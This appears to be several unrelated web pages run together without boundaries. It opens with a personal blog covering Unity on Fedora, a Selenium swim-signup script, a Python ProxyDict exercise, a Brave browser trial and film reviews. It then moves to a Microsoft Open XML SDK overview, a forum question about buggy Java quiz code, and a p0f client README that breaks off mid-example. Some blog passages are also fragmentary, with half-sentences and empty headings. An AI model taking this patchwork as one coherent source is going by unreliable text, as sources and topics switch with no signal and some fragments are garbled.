As I mentioned last year in my 2019 in Programming post, I created a bunch of 2D games in Unity by following along with the GameDev.tv classes. I would watch the videos on Linux and jump over to my Windows computer for the programming, learning how to use SourceTree and Microsoft Visual Studio in the process. But for some reason, going back and forth with the KVM when running Unity would sometimes freeze up the Windows computer. So when I saw someone on Fedora Planet running Unity Hub, I thought I'd see if there was a Flatpak – and there IS! Also, I've fallen in love with JetBrains' PyCharm, so I thought I'd go ahead and use their game dev IDE, Rider. (There's a Flatpak for that, too!) So, let's see how well this works!

Apparently if you go this route, you have to handle licensing first. I just clicked on manual activation. That led me to log in to Unity.com with my already-extant Unity creds. After answering some questions about how much money I make with Unity, they gave me a license file that I attached to Unity Hub. Then I went to the General section on the left there to tell it where to install Unity versions. Once that was done, the hub more or less looked like I remembered it on Windows.
I already knew, from my previous forays, that I would need to add a Unity install, so it was off to the Installs section. This is what the selection looked like:

I don't know if this is how it is on Windows now, too, since it's been a long time since I worked in Unity. But, having found myself with a new version of Unity every time I signed in – I'm glad they have LTS versions now. The CentOS of Unity, if you will.

I went and checked the next course I want to do, GameDev.tv's Unity Multiplayer class (here on Udemy and here on Gamedev.tv), and they want 2020.1. So I'll install that version. For some reason, it wouldn't let me download that version – it complained it would take up too much space (even though I have 900ish GB free and it said it would take up 10GB). But it decided it could install the LTS version. So, in the interest of seeing if it could open and run the games I'd previously developed, I just went with the LTS version for now.

It quit out and complained about a corrupted download. But I don't know where it was downloading to, because nothing was in the folder I told it to download to. If it is downloading somewhere else first, like /tmp – maybe that would explain the issues. Eventually I tell it not to do any runtimes and I keep trying to install a bunch of times. Like a reverse Murphy's law – as soon as I start posting about the problem on the /r/unity3D subreddit it starts working.

Despite my inability to install Unity 2020 over two days (edit: after literally 10 tries, restarting Unity Hub and restarting my computer, I finally got Unity 2020 to install), at least it ran my code from last year's class ok, including upgrading it to the LTS version (which came out after I last worked on it). When I hit play it also ran reasonably well – didn't seem to be at some incredibly low FPS. (Of course, this is a 2D game without lots of resources, but that's still encouraging). It wanted me to have VS Code running.
I think I also saw that on Flathub, but I decided to see if I could somehow get it to work with Rider in Flatpak form. I launched Rider for the first time and it started off by asking for my preferences. First off was the UI theme:

And what kind of hacker would I be if I didn't go with dark? Then it was time for the color schemes:

If I'd used a bunch more Visual Studio, I'd go with the middle selection. I'm a big fan of the Dracula themes I've been using in various editors, but I don't think that's the same as their Darcula theme, since that mentions IntelliJ. So I just went with Rider Dark.

I didn't have any particular preference here, so I just went with Visual Studio since I figured that would probably match shortcuts that the GameDev.tv guys would use. I decided not to do a Desktop Entry since, as you can see at the top of the next screenshot, it already seemed to have an icon:

I don't have the environment installed for C#. A quick bit of Googling seems to imply that Unity is using Mono for their C#, so I will try and get that installed first. After a bit of searching, I installed the mono-complete package on Fedora. Then it was time to choose Plugins. I didn't do any featured plugins. Afterwards I chose the free 30-day evaluation (maybe there isn't a community version like PyCharm's?) and decided to open my Block Destroyer project.

It didn't automatically install the Rider Unity plugin, but I blame that partially on Flatpak and partially on Fedora. (Everyone assumes Linux Unity dev is on Ubuntu or CentOS 7.) In the end I couldn't quite figure out how to connect the two, but I think it'll be easy enough to just load the files after I create my project. I did test that editing it in Rider will eventually recompile it in Unity once it realizes that the file has changed on disk. So I'm going to give this a shot for that new GameDev.tv class.
I’ll report back on whether it’s worth it or if you should just stick to Windows (or Ubuntu) if you’re doing Unity game development. PyGame 2.0 is out! I. Fedora 33 is out! It came out this Tuesday and last night I updated my laptop. The only thing I had to do for the upgrade was remove a python3-test package. Since I’m using virtual environments, for the most part I don’t care which Python packages the system has. So that was a nice, easy upgrade! Good job Fedora packagers and testers! Speaking of Python, it’ll be nice to start upgrading my projects to Python 3.9. (Fedora 33 includes the latest programming language versions as part of its “First” values) Probably the next upgrade will be Scarlett’s laptop since she has a school-provided Chromebook for school. What I’ve been up to in Programming: Python Selenium)) Spent a bunch of today trying to get SSL working correctly And failed and left my site offline most of the day. So I’ll have to try some stuff on the side and give it another shot.. Last Few Days in Programming: Lots of Python Been quite busy with Python, keeping me away from other pursuits, like video games. (Although the kids have been requesting Spelunky 2 whenever it’s time to hang out with them) Extra Life Donation Tracker (eldonationtracker) For my Extra Life Donation Tracker I pushed out a new release, v5.2.2. A user of my program (man, I never get tired of how awesome that is!!) had wholly anonymous donors which was causing an issue I thought I’d handled. But it turns out that the folks that run the Donor Drive API are a little inconsistent in how they handle that in the donor endpoint vs the donations endpoint. So I pushed that fix out and now things should be dandy for game day (about 2 weeks away!!) Automating some Boring Stuff In these COVID-19 times I have a problem – the YMCA where I’m a member has instituted signups for swimming. But you have to sign up EXACTLY 48 hours before you want to swim. 
Since I’m swimming every other day, that means that sign-up time is when I’m swimming. For a while I would just wait until after my swim to sign up. But it’s a VERY popular time. So I started taking my phone to the pool to sign up. There are many negatives to this:
- It takes ~5 minutes or so with my phone and LTE connection (out of a 45-minute session which is already shorter than I’d normally spend in there)
- It uses data
- I risk dropping my phone into the pool or into a puddle of water around the pool
- It means my phone is right there in my gym bag where someone could steal it (although that would give me a great excuse to buy a new one…)

So, while I was swimming today (best source of thoughts other than the shower), I realized I could probably use Selenium to automate this. I’ve never used it before, but I’d heard a lot about it. I knew that Al Sweigart talked about it in his book, Automate the Boring Stuff with Python. I bought a copy of the first edition, but I wanted to make sure I was up to date on the latest stuff, so I went to that link I just shared where he has it available to read for free. He’s using the model Cory Doctorow used to use where it’s there for free, but you can also buy it and help him and the publisher. Also, he has a class on Udemy that covers the same topics. Anyway, I spent all morning (literally) digging around in my browser’s inspector mode to get all the data I needed to automate the sign-up. I believe I’ve got it working (I’d already signed up for my next swim session, so I had to pretend to sign up for another time, but you can only sign up for one time per day). I set up a cron job, and the plan is to let it sign me up while I double-check afterwards (a safety valve in case it doesn’t work). I’m not ready to share this code at this point – mostly because I’d prefer that it keep working.
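Since I’m not sharing the actual script, here’s a purely hypothetical sketch (the function name and times are made up, not from the real script) of the one piece that’s easy to show – computing the moment exactly 48 hours before a desired swim slot, which is when the cron job needs to fire:

```python
# Hypothetical sketch only - not the real signup script.
# The YMCA rule: registration opens EXACTLY 48 hours before a slot,
# so the cron job has to fire at slot_time minus 48 hours.
from datetime import datetime, timedelta

def registration_opens(swim_slot):
    """Return the moment signup opens: exactly 48 hours before the slot."""
    return swim_slot - timedelta(hours=48)

# Made-up example slot: a 7:00 AM swim on October 12th
slot = datetime(2020, 10, 12, 7, 0)
print(registration_opens(slot))  # -> 2020-10-10 07:00:00
```

From there it’s just a matter of having Selenium drive the form once that moment arrives.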
However, it was a great experience in debugging, and a reminder that web scraping is just as annoying now as when I first learned about it somewhere around 15 years ago from O’Reilly books with titles like “Google Hacking” and “Flickr Hacking”.

raspigaragealert

As I mentioned in Switching up the hardware for the Garage IOT, I recently moved my Raspberry Pi-powered garage alert software from a Raspberry Pi 1B to a Raspberry Pi Zero W. The Raspberry Pi 1B is now in the office providing temperature and humidity data – quantifying just HOW HOT it is in here. This led me to have a renewed interest in the program. So I went ahead and created another config file in order to make it more generally usable to folks who aren’t me. Then I also created documentation. The documentation still needs a bit more work, but it could help others. Also, since it’s Hacktoberfest, someone made a PR for my code!! If this isn’t the first PR someone who wasn’t a co-author has made against one of my projects, it’s at least one of the first. So that’s exciting!

Python Morsels

Finally, for this time period there was the most recent Python Morsels exercise. I fell a little behind with some other projects (and Spelunky 2), so my most recent assignment was to “create a ProxyDict class which offers an immutable dictionary-like interface that wraps around a given dictionary.” The first bonus was to add support for len, items, values, and get. The second bonus was to implement iteration and a nice repr string. The final bonus was to support equality. At first I was a bit lost. I tried a naive solution where I just passed the keys of the dictionary I received in the __init__ method, but I got stuck on figuring out __getitem__. So then I thought I needed to use abstract base classes. I’d seen them in some book I read in the past few months. But I couldn’t remember what they were called. So I clicked on Trey’s first hint, which showed that I was right and reminded me of the term “abstract base class”.
This was not a “gimme”, for there was no Dictionary in collections.abc. So after looking at the table for a while, I thought Collection would give me a lot of what I wanted. But it was still missing a bit, so I looked at Mapping, which was probably the best thing to use because it was immutable and inherited from Collection. Unlike other problems in Python Morsels, this is a very, very esoteric part of Python, but it was interesting to learn how to implement an ABC; particularly the fact that it will let you know which dunder methods you’re missing when you try to create a class. Turns out that by doing this, I got bonuses 1 and 3 (and part of 2) for free! As for the __repr__ method – I’m a pro at those at this point. I kept thinking there must be some way to cheat and use the one from the dictionary I was proxying, but I didn’t know how. So:

def __repr__(self):
    center_list = []
    for key, value in self.proxy_dictionary.items():
        if isinstance(key, int):
            center_list.append(f"{key}: '{value}'")
        else:
            center_list.append(f"'{key}': '{value}'")
    center = ', '.join(center_list)
    return "ProxyDict({" + center + "})"

I don’t think I have the prettiest syntax for my repr method. I was trying to be elegant and use a list comprehension. That looked like:

center_list = [f"{key}: '{value}'" for key, value in self.proxy_dictionary.items()]
center = ', '.join(center_list)

But without using a lambda or something, I couldn’t figure out how to implement the if/else logic in the list comprehension.

What I learned from Trey’s Solution

First of all, when I said this was an esoteric thing, I wasn’t kidding. There’s actually already a way to do this without any work:

from types import MappingProxyType as ProxyDict

Thanks mostly to Trey’s problem sets I knew that I wanted to use yield or that I probably wanted to do a generator. So I thought my solution was pretty good. But it turns out there are two simpler ways I could have done it.
Since I’m proxying a dict, which already has an iter method, I could have done:

def __iter__(self):
    yield from self.proxy_dictionary

or I could have done:

def __iter__(self):
    return iter(self.proxy_dictionary)

I actually think the first one is more readable. For the repr I kept thinking there must be some easier way to do this, because the dictionary already has a repr. But I thought that would result in something like ProxyDict(dict(stuff)); apparently not, because this is Trey’s solution:

def __repr__(self):
    return f"ProxyDict({repr(self.proxy_dictionary)})"

Although that locks in the class name and causes issues if someone wants to do the same thing with our class. So the better way is:

def __repr__(self):
    return f"{type(self).__name__}({self.proxy_dictionary!r})"

The !r is the same as repr(self.proxy_dictionary). Well, time to go check out that Pull Request on raspigaragealert!

First 24 Hours with Podcast Republic: Evaluating moving from Doggcatcher to Podcast Republic

I’ve been using Doggcatcher for YEARS – ever since I first got a smartphone something like 8 or so years ago. I started using Doggcatcher on Dan’s recommendation. One of the best features it’s had is the ability to speed up podcasts without chipmunking the voice. (I think that came a year or so after I started using it.) Recently I’ve been a bit annoyed at Doggcatcher, particularly with podcasts from the EarWolf network (although there may be other networks with the same behavior). Every time Doggcatcher checks for updates, all the episodes from EarWolf will disappear and redownload. Until it is done, I can’t listen to the episode. Neil deGrasse Tyson’s podcast is also annoying in that if a new episode comes out before I’ve finished the previous one, it’ll overwrite it so that I now have two copies of the same file. This makes it more stressful than it needs to be when I’m trying to choose the next podcast to listen to. So I started asking folks for recommendations.
Dan recommended Podcast Republic to me. I don’t know if it’ll fix things for me because Dan was using it because Doggcatcher wasn’t working well for him for authenticated feeds, but I’m hopeful. It does have some features that I didn’t know I wanted: being able to sync across devices – which would have helped when I changed phones – as well as being able to listen on the web and sync (not something I’d use a LOT, but might use a bit). So I’m going to try it out and let you know what I think.

Brave on Windows Part 1

This post continues a series on exploring new browsers: I’ve been using Vivaldi on Windows for about four months now. As I keep saying, my browser needs on Windows aren’t too huge. Mostly I access YouTube, the Stardew Valley Farm uploader, and Google Docs. But I want to keep checking out new browsers on Windows first precisely because they are so important on my Linux computer. I don’t want to mess up a good thing there. So let’s start off with Brave’s new user tour: Interestingly, it doesn’t see Vivaldi as a browser to import from: Now onto the important part of what makes Brave, Brave: Intelligently, they tell you how to turn it off if it’s breaking sites, rather than let users think the browser’s rendering is broken. We’ll see how well it works for the sites I visit – probably just fine on Windows. Now, this I REALLY like. I guess since everyone else either owns search (Google and Microsoft) or gets paid by the search engine (Mozilla getting Google payments) I never see this. But I think this is the type of transparency that browsers should be providing! Not surprising since one of the Brave founders came from Mozilla. Rewards is a weird name for this, since I’m not getting paid or any items. But I do like the idea – you earn tokens that equate to money that gets paid out to the websites you want to support. Here’s a little more about it: I’m not going to sign up now because I don’t really visit enough sites on this computer and I just want to get on with it.
Here’s the page I get after that: Now, it may look suspicious to you that it claims to have already blocked some trackers when I’ve only gone through their welcome page. I, too, was suspicious at first. But then I remembered when I imported settings from Chrome, it took me to some Adobe page. So new tabs always look like this. I opened a new tab without doing anything else: Looks like they make money from cryptocurrencies? However, true to what you’d expect, unlike Vivaldi it doesn’t pre-populate your new tab with a bunch of sponsored sites. In fact, my speed dial still looks exactly the same on Vivaldi. Here’s how the blog looks on Brave: I like the fonts it chooses to render with. It claims to have stopped trackers on my site. I don’t know of any, so I’m going to guess that the “Share This” widget has some of that embedded, as do embedded YouTube videos. Let’s take a quick look at two sites I use that have ads. First Ars Technica: But I guess these things aren’t ads: And a quick look at reddit: There’s definitely an ad missing in that square. Supposedly also 13 ads and trackers. Again, Brave doesn’t seem to have nearly as many widgets as Vivaldi, but that’s not surprising; Vivaldi, like Opera before it, is known for being a power user’s browser. I don’t know if this ends up being a pro or a con for Brave in the long run. It’s a nice, clean browser that more or less seems to look and feel like a regular browser – just with supposedly less tracking and fewer ads. To get the same experience as Vivaldi would probably involve lots of potentially dangerous extensions. We’ll see how it handles my day-to-day on Windows.

Switching up the hardware for the Garage IOT

Back in May, I set up my Raspberry Pi B as my garage door monitor. Unfortunately it stopped working. I haven’t investigated yet, but I wouldn’t be surprised if it got hit with the infamous SD card corruption that was a big problem with the early Raspberry Pi boards.
(I think I read it’s much less of a problem with the Raspberry Pi 4.) So I decided to go ahead and replace it with a Raspberry Pi Zero W, especially since you can get it with headers from Adafruit for only $14. As a bonus, it’s got a better processor (same as the Raspberry Pi 3, I think) and built-in WiFi. It’s also got a smaller footprint, but that doesn’t matter to me for where it’s mounted. So now I’m back to having a Raspberry Pi B without a job to do (assuming the hardware is fine and it just ended up in an unbootable state). I’ve also now got a USB WiFi module for it, so maybe that’ll help me think of something for it to do. I think the Raspberry Pi rover project I got in a Humble Bundle uses a 1st gen Raspberry Pi, but I’d been thinking of using a 4th gen Pi in order to maybe do some more fun stuff with it like some OpenCV-based computer vision and/or machine learning.

All Journey and No Destination: Friday and Fast Times at Ridgemont High

By complete coincidence I ended up watching Fast Times at Ridgemont High and Friday (each for the first time) back to back this week. I watched Fast Times because Paul Scheer and Amy Nicholson were covering it on Unspooled, their film podcast. As for Friday, well, that’s a slightly more convoluted story. Five Iron Frenzy, one of my most consistently favorite bands, was doing a Kickstarter for their new album. As part of the promotion for the campaign, Reese Roper appeared on Mike Herrera’s podcast, The Mike Herrera Podcast. Herrera is the lead singer and songwriter for MxPx, a band I’ve been listening to off and on since 1996ish. The Roper episode led me to look up MxPx’s latest release, MxPx. There’s a song on there called Friday Tonight that had some lyrics that didn’t make sense to me: So I went to genius.com’s page for the song and found out it was this scene from the movie Friday: So I decided to check out the movie. It was an interesting couple of movies to watch back-to-back for the first time.
In the first season of the Unspooled podcast they covered the movies on the AFI Top 100 list. For this season they are looking at movies that perhaps should have a place on the list (although the stated fate of the season 2 list is to be sent into space) and are exploring the movies by category. The first category is high school movies. I’d never seen Fast Times at Ridgemont High because it came out when I was too young and, for some reason, I never happened to catch it on Comedy Central, TNT, or any of the other cable channels that used to just show TV edits of movies before they started having shows in their own right. I’m not entirely sure what I was expecting, but from the trailer and various bits of the movie that had become part of the culture/memes/etc., I was expecting a zany film. Or at least a film that operated on the level of reality of Ferris Bueller, which came out four years later. Or maybe something like Grease, but without the music. Instead we got a movie where, when we reached the scene with Spicoli taking a joy ride in the football player’s car, I turned to my wife and asked, “What’s the point of this movie? I’m not getting a plot.” Instead it’s almost a series of vignettes that takes us through an entire school year at Ridgemont High. I learned afterwards (while listening to the podcast) that this is because it was based on a non-fiction book written by a Rolling Stone writer who studied the senior class at a high school. (Incidentally, Mean Girls was also based on a book, but that one ended up having a much more conventional plot.) Plot-wise this movie seems to be at least one of the seeds that lead to most of the movies from Kevin Smith’s View-Askew-niverse – particularly Clerks and Mallrats. It also wasn’t nearly as comedic as I thought it would be. There are funny moments, but it’s more of a drama with funny moments – like real life.
Mostly we follow Stacy Hamilton (Jennifer Jason Leigh), who puts in an amazing performance as a 15-year-old who falls for the trope of having an unexplained need to lose her virginity; a trope that persisted until the 1990s when we finally started taking AIDS and other STDs seriously. What I mean by unexplained need is that Stacy seems not to want sex simply because of her teenage hormones, but more because it seems to be expected in her peer group if she doesn’t want people to consider her a baby. I even remember a Fresh Prince of Bel-Air episode where Carlton is very embarrassed to be a virgin. By contrast, by the time I was in high school in the late 90s there wasn’t really any pressure to graduate without one’s virginity. It was more of a personal choice that people made – at least among my non-church peers. They’d been scaring us about STDs and the almost 100% chance of teenage pregnancy for so long that I was shocked when, as a married man, we didn’t get a baby on the first try. Anyway, her arc ends up being the most realistic movie depiction I’ve ever seen of the disappointment of teenage sex from the girl’s point of view. (The podcast clarified this was one of the director’s messages.) The first attempt is the famous dugout scene. Second attempt, she gets thwarted in a humiliating way. Third attempt, the dude is a one-minute man. By contrast, movie sex is usually from a male perspective. I also loved the way she handled talking to Damone once she got pregnant, not taking his attempt to shift blame onto her. “No, take that back.” Man, that was really great writing of a strong character. A different writer might have made her cave there, but Stacy isn’t playing victim, she’s just trying to get Damone to be fair by paying for his part in it. That’s the clearest arc in the movie. Jeff Spicoli (Sean Penn) is merely comic relief. Linda Barrett (Phoebe Cates) is simply there to give bad advice to Stacy.
Mark Ratner (Brian Backer) seems like he’s going to be the main character, but he’s mostly just a foil to Damone (Robert Romanus) and a second attempt at sex for Stacy. And Brad Hamilton (Judge Reinhold) is almost certainly the basis of Kevin Smith’s long-suffering Dante Hicks (Clerks and Clerks 2). Despite a good work ethic, capitalism just beats him down over and over throughout the film. None of the usual plots are in evidence – no one is in danger of not graduating (maybe Spicoli is, but he’s merely a comedic element, not a real character), no one is trying to get into the big party, no male or female is in a “she cleans up nicely” trope, even Ratner isn’t trying very hard to get with Stacy. Yet, somehow this movie really hits for me. Perhaps it’s the more documentary-ish storytelling due to it being based on a book. In the hands of our director (who also directed Clueless), the characters and situations aren’t heightened. As someone who worked in high school (selling shoes, as a lifeguard, in a movie theatre, and as a bank teller), that aspect of the story really worked for me compared to the newer movies where the kids just have cash without needing to do anything for it. A few odds and ends before moving on to Friday: I have to give kudos to the set designer for selecting oversized chairs in the restaurant during Ratner and Stacy’s date. They look ridiculously oversized, emphasizing that they are kids playing at being adults. My wife and I are fond of remarking on something we’ve noticed in movies from the late 70s and through the 80s (and I’m pretty sure I’ve mentioned it on the blog at some point). Movies from that time period will inevitably have precocious kids using profanity (the “worse” the word, the “funnier” it seems) and you will see lots of gratuitous breasts. Fast Times at Ridgemont High is no exception. (Judge Reinhold’s fantasy is completely without consequence to the plot.)
During the Unspooled episode about the movie, the director mentioned that during the 80s, a certain quota of breast shots was a requirement for securing financing for a movie. So it’s not just something we’ve noticed, it’s an actual thing that was going on. (Frankly, on seeing how things were handled in Fast Times at Ridgemont High with bare breasts, I’m surprised we don’t end up seeing Cameron naked in Ferris Bueller.) Speaking of nudity, the director mentioned that, for the scene where Damone and Stacy have sex, she originally wanted to show full frontal nudity of Damone because there was already a bunch of full frontal female nudity in rated R movies at the time. She was told no because the male anatomy is automatically an aggressive organ while the female is passive, so it would have been rated X. Of course, the sad part – thanks to Hollywood being so silly that we have the term Hollywood-ugly to describe someone the characters consider ugly but who is beautiful by normal standards – is that during a preview screening someone yelled out “fat chick” at Stacy’s naked body. I’m going to link to the image (rather than posting it in this post) in order to keep this post safe for work. (SO THIS LINK IS NOT SAFE FOR WORK.) Yeah, I’ll note that I was surprised Hollywood let a woman look like that in a movie, but she is definitely NOT fat. One last thing – does Stacy’s boyfriend in Chicago exist? I thought he didn’t until she started crying at the end of the movie because he wasn’t coming to graduation. My wife thought he was real. Paul Scheer was sure he was fake and Amy Nicholson thought he was real, but was maybe convinced by the end of the podcast that he wasn’t. While Fast Times at Ridgemont High takes place over a school year, Friday takes place over the course of one day. My wife had seen it enough times to be able to quote lines as they were happening.
I never saw it because it was rated R and my parents were very strict about seeing movies rated higher than our ages. And later I was into very different movies, so I never thought about it until MxPx brought it back to my attention. Interestingly, even though both of these movies are ostensibly without traditional plot structures, this one just didn’t work for me as well as Fast Times at Ridgemont High did. Perhaps this is because Friday only takes place over the course of one day, so there isn’t even a character progression. Yet Ferris Bueller also takes place over a single day. I think the big difference is that Bueller and friends are out on an illicit adventure (and, near the end, the need to avoid getting caught) while Ice Cube and the rest of the cast are simply sitting outside. Perhaps a more successful movie for me would have involved Ice Cube and Chris Tucker sitting outside for a normal day only to end up dragged on some sort of quest or to have things go insanely wrong. Instead, there are only two desires our main characters have. Chris Tucker wants to get Ice Cube high for the first time. This is accomplished midway through the movie and doesn’t have any consequences. He doesn’t do anything or cause anything to happen from being high – it doesn’t even mess up Ice Cube’s chances with the girl across the street. And she’s Ice Cube’s desire, but it’s not as though he is a nerd who’s never had a girl – he CURRENTLY has a girlfriend. (Although, for all her protesting at Ice Cube interacting with other women, my wife noticed that she has a guy in her bed when she calls Ice Cube on the phone.) Instead we get an SNL skit-like day where the same folks keep stopping by over and over. Why isn’t anyone working or in school?
I was at a loss to figure out what age anyone was supposed to be, partially because Hollywood tends to cast way older (something they’ve started to fix) – after all, except for Jennifer Jason Leigh, no one in Fast Times at Ridgemont High looks like they belong in high school. Well, one potential plotline could have been the fact that Ice Cube lost his job because there is video footage of him stealing. Ice Cube says the guy in the video isn’t him. A few characters say different things about the robbery, but by the time the movie is done, I have no idea whether or not it was him. A different movie could have had him proving that it wasn’t him or trying to get another job and either succeeding or failing in comedic ways. But this paragraph is where I state something I’ve been thinking of as I’ve worked on this essay a little at a time over the past week. Maybe all of this makes sense if you grew up in a neighborhood like the one in the movie? Maybe there are some people for whom the plot – with some folks just sitting on the porch and others stopping by over and over – makes sense. But for me it just fell flat when combined with the lack of a traditional plot motivation for any of the characters. It also seemed to take a wild swing at the end when it went from a mostly goofy movie to DEADLY serious when Zeus gives Felicia a black eye and then hits the girl Ice Cube would like to get with. It’s suddenly about whether shooting a gun is worth it. And while we did literally have Chekhov’s Gun, it was some real tonal whiplash. Then again, I remember some Fresh Prince of Bel-Air episodes doing that, too. So maybe it’s just an expected trope. A couple of stray thoughts: I finally got to see the origin of the meme “Bye Felicia”. However, the character of Felicia didn’t make sense to me. Throughout the first ¾ of the movie she appears at Ice Cube’s house asking to borrow things that don’t make sense to borrow – like a microwave.
She looks and acts like she’s probably a homeless addict. Yet, near the end you find out that she’s the sister of the girl Ice Cube has been after. So, does this mean she’s just mentally ill? And if she is, does that make all the jokes at her expense worse? (Although my question does imply it’s OK to laugh at an addict. But we do have a male character who’s a homeless addict who is 100% just played for laughs.) Why is Bernie Mac a shady preacher in this movie and a shady judge in Booty Call? Was it part of his standup at the time or is he just really good at that role? In the end, I think it’s interesting that I watched both of these cultural touchstone movies back-to-back without any foreknowledge of the plot and they both happened to be movies without traditional plot structures. Fast Times at Ridgemont High turned out to be really enjoyable while Friday turned out to be a dud for me. The next episode of Unspooled is going to be Dazed and Confused, but I don’t know if it’ll merit a blog post on its own. Time will tell.

Last few weeks in Programming: Python, Ruby

Review: InvestiGators

My rating: 4 of 5 stars

Read this to my four-year-olds and found it to be a blast. Most of the word-play went over their heads. In fact, after finishing it with my four-year-olds, I recommended it to my 8-year-old. We’ll see what she thinks. This is definitely one of those books you can read with the kids and, if you like Dad Jokes and Puns, you’ll be enjoying it rather than wishing you were doing something else. View all my reviews
About the Open XML SDK 2.5 for Office

Last modified: August 23, 2012

Applies to: Office 2013 | Open XML

In this article:
- Structure of an Open XML Package
- Open XML SDK 1.0
- Open XML SDK 2.0 for Microsoft Office
- Open XML SDK 2.5 for Office

Open XML is an open standard for word-processing documents, presentations, and spreadsheets that can be freely implemented by multiple applications on different platforms. Open XML is designed to faithfully represent existing word-processing documents, presentations, and spreadsheets that are encoded in binary formats defined by Microsoft Office applications. The reason for Open XML is simple: billions of documents now exist but, unfortunately, the information in those documents is tightly coupled with the programs that created them. The purpose of the Open XML standard is to de-couple documents created by Microsoft Office applications so that they can be manipulated by other applications independent of proprietary formats and without the loss of data.

Structure of an Open XML Package

An Open XML file is stored in a ZIP archive for packaging and compression. You can view the structure of any Open XML file using a ZIP viewer. An Open XML document is built of multiple document parts. The relationships between the parts are themselves stored in document parts. The ZIP format supports random access to each part. For example, an application can move a slide from one presentation to another presentation without parsing the slide content. Likewise, an application can strip all of the comments out of a word processing document without parsing any of its contents. The document parts in an Open XML package are created as XML markup. Because XML is structured plain text, you can view the contents of a document part using text readers or you can parse the contents using processes such as XPath.

Word processing documents are described by using WordprocessingML markup. For more information, see Working with WordprocessingML documents (Open XML SDK).
A WordprocessingML document is composed of a collection of stories where each story is one of the following:
- Main document (the only required story)
- Glossary document
- Header and footer
- Text box
- Footnote and endnote

Presentations are described by using PresentationML markup. For more information, see Working with PresentationML documents (Open XML SDK). Presentation packages can contain the following document parts:
- Slide master
- Notes master
- Handout master
- Slide layout
- Notes

Spreadsheet workbooks are described by using SpreadsheetML markup. For more information, see Working with SpreadsheetML documents (Open XML SDK). Workbook packages can contain:
- Workbook part (required part)
- One or more worksheets
- Charts
- Tables
- Custom XML

Open XML SDK 1.0

Version 1 of the Open XML SDK simplified the manipulation of Open XML packages. The Open XML SDK Application Programming Interface (API) encapsulates many of the common tasks that you typically perform on Open XML packages.

Open XML SDK 2.0 for Microsoft Office

The Open XML SDK 2.0 for Microsoft Office extended the strongly typed class support from the part classes, which are provided in version 1.0, to the XML content in each part. All functions available in version 1.0 are still supported. With version 2.0, you are able to program against the XML content inside the part. The SDK supports programming in the style of LINQ to XML, which makes coding against the XML content much easier than the traditional W3C XML DOM programming model. The SDK supports the following common tasks/scenarios:
- Strongly Typed Classes and Objects—Instead of relying on generic XML functionality to manipulate XML, which requires that you be aware of element/attribute/value spelling as well as namespaces, you can use the Open XML SDK to accomplish the same solution simply by manipulating objects that represent elements/attributes/values. All schema types are represented as strongly typed Common Language Runtime (CLR) classes and all attribute values as enumerations.
- Content Construction, Search, and Manipulation—The LINQ technology is built directly into the SDK. As a result, you are able to perform functional constructs and lambda expression queries directly on objects representing Open XML elements. In addition, the SDK allows you to easily traverse and manipulate content by providing support for collections of objects, like tables and paragraphs.
- Validation—The Open XML SDK 2.0 for Microsoft Office provides validation functionality, enabling you to validate Open XML documents against different variations of the Open XML Format.

Open XML SDK 2.5 for Office

The Open XML SDK 2.5 provides the namespaces and members to support Microsoft Office 2013. The Open XML SDK 2.5 can also read ISO/IEC 29500 Strict Format files. The Strict format is a subset of the Transitional format that does not include legacy features – this makes it theoretically easier for a new implementer to support since it has a smaller technical footprint. The SDK supports the following common tasks/scenarios:
- Support of Office 2013 Preview file format—In addition to the Open XML SDK 2.0 for Microsoft Office classes, Open XML SDK 2.5 provides new classes that enable you to write and build applications to manipulate Open XML file extensions of the new Office 2013 features.
- Reads ISO Strict Document File—Open XML SDK 2.5 can read ISO/IEC 29500 Strict Format files. When the Open XML SDK 2.5 API opens a Strict Format file, each Open XML part in the file is loaded to an OpenXmlPart class of the Open XML SDK 2.5 by mapping namespaces to the corresponding namespaces.
- Fixes to the Open XML SDK 2.0 for Microsoft Office—Open XML SDK 2.5 includes fixes to known issues in the Open XML SDK 2.0 for Microsoft Office. These include lost whitespaces in PowerPoint presentations and an issue with the Custom UI in Word documents where a specified argument was reported as being out of the range of valid values.
You can find more information about these and other new features of the Open XML SDK 2.5 in the What's new in the Open XML SDK 2.5 for Office article.
https://msdn.microsoft.com/en-us/library/bb456487(v=office.15)
So I finally finished compiling my code and it has no errors; however, once I run it, it crashes with this error:

java.lang.NullPointerException
        at CanadianGeography.main(CanadianGeography.java:23)

This is the code for the program. I looked at line 23, but I don't understand what the error is or how to fix it. Can someone help?

Code:
import java.awt.*;
import hsa.Console;

public class CanadianGeography
{
    static Console c; //output console

    public static void main (String [] args)
    {
        new Console ();
        double finalscore, right, wrong;
        int score;
        String prov, cap;
        /*include x as an empty spot so index starts at 1*/
        String [] provanswers = {"x", "Alberta", "Saskatchewan", "Manitoba", "Ontario", "Quebec", "Newfoundland an Labrador", "New Brunswick", "Prince Edward Island", "Nova Scotia"};
        String [] capanswers = {"x", "Edmonton", "Regina", "Winnipeg", "Ottawa", "Quebec City", "St.John's", "Fredericton", "Charlottetown", "Halifax"};
        score = 0;
        /*prompt user and check answer*/
        c.println ("What is the province farthest to the west?");
        prov = c.readString ();
        c.println ("What is the name of the capital there?");
        cap = c.readString ();
        if (prov == "British Colombia" & cap == "Victoria")
        {
            score = score + 1; //incriment the score if the answer is right
        }
        else
        {
            score = score + 0; //add zero to the score if the question is wrong
        }
        /*loop questions for the other provinces*/
        for (int i = 1; i < 11; i++)
        {
            c.println ("What is the next province east to it?");
            prov = c.readString ();
            c.println ("What is the name of the capital there?");
            cap = c.readString ();
            /*check answer for province and capital*/
            if (prov == provanswers [i] && cap == capanswers [i])
            {
                score = score + 1;
            }
            else
            {
                score = score + 0; //add zero to the score if the question is wrong
            }
        } //end of loop
        /*tabulate score*/
        wrong = 20 - score;
        right = score - wrong;
        finalscore = score/20;
        c.println ("You got" + wrong + "wrong, and " + right + "right out of 20.");
        if (score <= 0.50)
        {
            c.println ("Not enough to pass. Try again.");
        }
        else if (score >= 0.90)
        {
            c.println ("You are the most brilliant person in the world");
        }
        else if (score > 50 && score < 90)
        {
            c.println ("Good");
        }
    } //end of main method
} //end of class
http://forums.codeguru.com/printthread.php?t=534413&pp=15&page=1
p0f 0.1.0

API client for p0f3

This is a simple API client for p0f3, available at . It is not compatible with version 2.x or 1.x. Start p0f with the -s path/to/unix_socket option.

Basic usage:

from p0f import P0f, P0fException

data = None
p0f = P0f("p0f.sock")  # point this to socket defined with "-s" argument.
try:
    data = p0f.get_info("192.168.0.1")
except P0fException, e:
    # Invalid query was sent to p0f. Maybe the API has changed?
    print e
except KeyError, e:
    # No data is available for this IP address.
    print e
except ValueError, e:
